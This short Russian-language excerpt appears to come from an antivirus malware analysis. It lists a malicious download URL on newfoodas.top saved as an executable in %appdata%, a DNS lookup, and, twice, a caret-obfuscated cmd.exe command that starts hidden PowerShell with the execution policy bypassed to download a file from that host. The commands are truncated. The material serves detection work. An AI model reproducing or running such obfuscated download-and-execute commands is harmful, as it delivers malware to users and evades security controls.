Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^ErS^h^E^LL.^EX^e ^-e^xeC^UTIOnp^oLiCY^ ^BypASs -^nOpROfiLE ^-^winDO^WsT^YLe^ HiD^d^E^N (^n^ew-OBJ^Ec^t^ sy^StE^m^.NET.w^E^B^ClI^enT)^.dOWNlO^AD^FI^L^e^('http://newfoodas.top/...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "Pow^ErS^h^E^LL.^EX^e ^-e^xeC^UTIOnp^oLiCY^ ^BypASs -^nOpROfiLE ^-^winDO^WsT^YLe^ HiD^d^E^N (^n^ew-OBJ^Ec^t^ sy^StE^m^.NET.w^E^B^ClI^enT)^.dOWNlO^AD^FI^L^e^('http://newfoodas.top/...' (со скрытым окном)